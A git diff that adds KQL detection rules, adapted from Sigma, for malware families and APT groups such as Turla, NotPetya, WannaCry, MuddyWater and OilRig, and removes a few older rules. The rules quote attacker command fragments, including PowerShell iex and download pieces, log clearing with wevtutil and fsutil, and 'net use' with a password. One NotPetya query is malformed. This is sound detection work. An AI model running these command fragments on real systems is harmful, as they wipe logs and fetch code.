-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/Initial Access/Unusual_File_Modification_by_dns.exe.kql b/Initial Access/Unusual_File_Modification_by_dns.exe.kql
deleted file mode 100644
index 1c228bcf..00000000
--- a/Initial Access/Unusual_File_Modification_by_dns.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/Initial Access/Windows_Registry_Trust_Record_Modification.kql b/Initial Access/Windows_Registry_Trust_Record_Modification.kql
deleted file mode 100644
index 614be3d0..00000000
--- a/Initial Access/Windows_Registry_Trust_Record_Modification.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb, Trent Liffick (@tliffick)
-// Date: 2020/02/19
-// Level: medium
-// Description: Alerts on trust record modification within the registry, indicating usage of macros
-// Tags: attack.initial_access, attack.t1566.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql b/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql
new file mode 100644
index 00000000..0f4c6957
--- /dev/null
+++ b/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql
@@ -0,0 +1,12 @@
+// Title: ZxShell Malware
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2017-07-20
+// Level: critical
+// Description: Detects a ZxShell start by the called and well-known function name
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "zxFunction" or ProcessCommandLine contains "RemoteDiskXXXXX") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql
new file mode 100644
index 00000000..69c36a2b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql
@@ -0,0 +1,10 @@
+// Title: Turla Group Commands May 2020
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-26
+// Level: critical
+// Description: Detects commands used by Turla group as reported by ESET in May 2020
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "tracert -h 10 yahoo.com" or ProcessCommandLine contains ".WSqmCons))|iex;" or ProcessCommandLine contains "Fr`omBa`se6`4Str`ing") or (ProcessCommandLine contains "@aol.co.uk" and ProcessCommandLine matches regex "net\\s+use\\s+https://docs.live.net")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql
new file mode 100644
index 00000000..d12fb095
--- /dev/null
+++ b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql
@@ -0,0 +1,10 @@
+// Title: Turla Group Lateral Movement
+// Author: Markus Neis
+// Date: 2017-11-07
+// Level: critical
+// Description: Detects automated lateral movement by Turla group
+// MITRE Tactic: Execution
+// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine startswith "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" " or (ProcessCommandLine contains "dir c:\\" and ProcessCommandLine contains ".doc" and ProcessCommandLine contains " /s") or (ProcessCommandLine contains "dir %TEMP%\\" and ProcessCommandLine contains ".exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql
new file mode 100644
index 00000000..a9ffd5af
--- /dev/null
+++ b/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql
@@ -0,0 +1,10 @@
+// Title: Exploit for CVE-2015-1641
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: critical
+// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\MicroScMgmt.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql
new file mode 100644
index 00000000..490fe1d9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql
@@ -0,0 +1,12 @@
+// Title: Exploit for CVE-2017-0261
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: medium
+// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats
+// False Positives:
+//   - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
+
+DeviceProcessEvents
+| where FolderPath contains "\\FLTLDR.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql
new file mode 100644
index 00000000..d9a4601f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql
@@ -0,0 +1,10 @@
+// Title: Droppers Exploiting CVE-2017-11882
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-11-23
+// Level: critical
+// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql
new file mode 100644
index 00000000..9cd70a63
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql
@@ -0,0 +1,10 @@
+// Title: Exploit for CVE-2017-8759
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-09-15
+// Level: critical
+// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql
new file mode 100644
index 00000000..634c1049
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql
@@ -0,0 +1,10 @@
+// Title: Adwind RAT / JRAT
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Roaming\\Oracle" and ProcessCommandLine contains "\\java" and ProcessCommandLine contains ".exe ") or (ProcessCommandLine contains "cscript.exe" and ProcessCommandLine contains "Retrive" and ProcessCommandLine contains ".vbs ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql b/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql
new file mode 100644
index 00000000..a008eaeb
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql
@@ -0,0 +1,10 @@
+// Title: Fireball Archer Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-03
+// Level: high
+// Description: Detects Archer malware invocation via rundll32
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "InstallArcherSvc"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql
new file mode 100644
index 00000000..38aaae2e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql
@@ -0,0 +1,10 @@
+// Title: NotPetya Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi
+// Date: 2019-01-16
+// Level: critical
+// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats
+
+DeviceProcessEvents
+| where "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" or ProcessCommandLine endswith ".dat #1" or ProcessCommandLine endswith ".zip.dll\",#1") and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine contains "wevtutil cl Application & fsutil usn deletejournal /D C:" or ProcessCommandLine contains "dllhost.dat %WINDIR%\\ransoms")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql b/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql
new file mode 100644
index 00000000..ffe1c480
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential PlugX Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-12
+// Level: high
+// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\CamMute.exe" and (not((FolderPath contains "\\Lenovo\\Communication Utility\\" or FolderPath contains "\\Lenovo\\Communications Utility\\")))) or (FolderPath endswith "\\chrome_frame_helper.exe" and (not(FolderPath contains "\\Google\\Chrome\\application\\"))) or (FolderPath endswith "\\dvcemumanager.exe" and (not(FolderPath contains "\\Microsoft Device Emulator\\"))) or (FolderPath endswith "\\Gadget.exe" and (not(FolderPath contains "\\Windows Media Player\\"))) or (FolderPath endswith "\\hcc.exe" and (not(FolderPath contains "\\HTML Help Workshop\\"))) or (FolderPath endswith "\\hkcmd.exe" and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysNative\\" or FolderPath contains "\\SysWow64\\")))) or (FolderPath endswith "\\Mc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit")))) or (FolderPath endswith "\\MsMpEng.exe" and (not((FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Windows Defender\\" or FolderPath contains "\\AntiMalware\\")))) or (FolderPath endswith "\\msseces.exe" and (not((FolderPath contains "\\Microsoft Security Center\\" or FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Microsoft Security Essentials\\")))) or (FolderPath endswith "\\OInfoP11.exe" and (not(FolderPath contains "\\Common Files\\Microsoft Shared\\"))) or (FolderPath endswith "\\OleView.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\")))) or (FolderPath endswith "\\rc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\" or FolderPath contains "\\Microsoft.NET\\"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql
new file mode 100644
index 00000000..beaad77c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql
@@ -0,0 +1,10 @@
+// Title: WannaCry Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-01-16
+// Level: critical
+// Description: Detects WannaCry ransomware activity
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "@Please_Read_Me@.txt" or ((FolderPath endswith "\\tasksche.exe" or FolderPath endswith "\\mssecsvc.exe" or FolderPath endswith "\\taskdl.exe" or FolderPath endswith "\\taskhsvc.exe" or FolderPath endswith "\\taskse.exe" or FolderPath endswith "\\111.exe" or FolderPath endswith "\\lhdfrgui.exe" or FolderPath endswith "\\linuxnew.exe" or FolderPath endswith "\\wannacry.exe") or FolderPath contains "WanaDecryptor")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql
new file mode 100644
index 00000000..f50e6cdd
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential APT10 Cloud Hopper Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-04-07
+// Level: high
+// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".vbs /shell " and FolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "csvde -f C:\\windows\\web\\" and ProcessCommandLine contains ".log")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql
new file mode 100644
index 00000000..26162c2d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql
@@ -0,0 +1,12 @@
+// Title: Ps.exe Renamed SysInternals Tool
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-10-22
+// Level: high
+// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats
+// False Positives:
+//   - Renamed SysInternals tool
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ps.exe -accepteula" and ProcessCommandLine contains "-s cmd /c netstat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql
new file mode 100644
index 00000000..577ea20e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql
@@ -0,0 +1,12 @@
+// Title: Lazarus System Binary Masquerading
+// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
+// Date: 2020-06-03
+// Level: high
+// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msdtc.exe" or FolderPath endswith "\\gpsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql b/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql
new file mode 100644
index 00000000..b5aced43
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql
@@ -0,0 +1,10 @@
+// Title: Pandemic Registry Key
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-01
+// Level: critical
+// Description: Detects Pandemic Windows Implant
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\services\\null\\Instance"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql
new file mode 100644
index 00000000..d96919dd
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Elise Backdoor Activity
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-01-31
+// Level: critical
+// Description: Detects Elise backdoor activity used by APT32
+// MITRE Tactic: Execution
+// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\Windows\\Caches\\NavShExt.dll" and ProcessCommandLine contains "/c del") or FolderPath endswith "\\Microsoft\\Network\\svchost.exe") or (ProcessCommandLine contains ",Setting" and (ProcessCommandLine endswith "\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll" or ProcessCommandLine endswith "\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql
new file mode 100644
index 00000000..5ca2cf40
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql
@@ -0,0 +1,12 @@
+// Title: APT27 - Emissary Panda Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-09-03
+// Level: critical
+// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath endswith "\\sllauncher.exe") or (ProcessCommandLine contains "-k" and FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql
new file mode 100644
index 00000000..6bf7a8d0
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql
@@ -0,0 +1,10 @@
+// Title: Sofacy Trojan Loader Activity
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-01
+// Level: high
+// Description: Detects Trojan loader activity as used by APT28
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".dat\"," or (ProcessCommandLine endswith ".dll #1" or ProcessCommandLine endswith ".dll\" #1" or ProcessCommandLine endswith ".dll\",#1")) and ((ProcessCommandLine contains "%LOCALAPPDATA%" or ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\rundll32.exe")) and (not(ProcessCommandLine contains "\\AppData\\Local\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql
new file mode 100644
index 00000000..19465ea3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql
@@ -0,0 +1,12 @@
+// Title: APT29 2018 Phishing Campaign CommandLine Indicators
+// Author: Florian Roth (Nextron Systems), @41thexplorer
+// Date: 2018-11-20
+// Level: critical
+// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-noni -ep bypass $" or (ProcessCommandLine contains "cyzfc.dat," and ProcessCommandLine contains "PointFunctionCall")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql
new file mode 100644
index 00000000..8f93e799
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql
@@ -0,0 +1,12 @@
+// Title: APT29 2018 Phishing Campaign File Indicators
+// Author: @41thexplorer
+// Date: 2018-11-20
+// Level: critical
+// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath contains "ds7002.lnk" or FolderPath contains "ds7002.pdf" or FolderPath contains "ds7002.zip"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql
new file mode 100644
index 00000000..4a349ff4
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql
@@ -0,0 +1,10 @@
+// Title: OceanLotus Registry Activity
+// Author: megan201296, Jonhnathan Ribeiro
+// Date: 2019-04-14
+// Level: critical
+// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*" or RegistryKey endswith "Classes\\AppX3bbba44c6cae4d9695755183472171e2*" or RegistryKey endswith "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}*" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey endswith "\\SOFTWARE\\App*" and ((RegistryKey endswith "AppXbf13d4ea2945444d8b13e2121cb6b663*" or RegistryKey endswith "AppX70162486c7554f7f80f481985d67586d*" or RegistryKey endswith "AppX37cc7fdccd644b4f85f4b22d5a3f105a*") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql
new file mode 100644
index 00000000..defe9e0d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential MuddyWater APT Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-10
+// Level: high
+// Description: Detects potential Muddywater APT activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "vbscript:Close(Execute(\"CreateObject(" and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-w 1 -exec Bypass" and ProcessCommandLine contains "\\ProgramData\\") or (ProcessCommandLine contains "[Convert]::ToBase64String" and ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString]" and ProcessCommandLine contains "GetResponse().GetResponseStream()" and ProcessCommandLine contains "[System.Net.HttpWebRequest]::Create(" and ProcessCommandLine contains "-bxor ") or (ProcessCommandLine contains "Win32_OperatingSystem" and ProcessCommandLine contains "Win32_NetworkAdapterConfiguration" and ProcessCommandLine contains "root\\SecurityCenter2" and ProcessCommandLine contains "[System.Net.DNS]")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql
new file mode 100644
index 00000000..cbfa9fa2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql
@@ -0,0 +1,12 @@
+// Title: OilRig APT Activity
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2018-03-23
+// Level: critical
+// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "nslookup.exe" and ProcessCommandLine contains "-q=TXT") and InitiatingProcessFolderPath endswith "\\local\\microsoft\\Taskbar\\autoit3.exe") or (ProcessCommandLine contains "SC Scheduled Scan" and ProcessCommandLine contains "\\microsoft\\Taskbar\\autoit3.exe") or ((ProcessCommandLine contains "i" or ProcessCommandLine contains "u") and FolderPath =~ "C:\\Windows\\system32\\Service.exe") or (FolderPath contains "\\Windows\\Temp\\DB\\" and FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql
new file mode 100644
index 00000000..da5c71ca
--- /dev/null
+++ b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql
@@ -0,0 +1,12 @@
+// Title: OilRig APT Registry Persistence
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2018-03-23
+// Level: critical
+// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
+// MITRE Tactic: Privilege Escalation
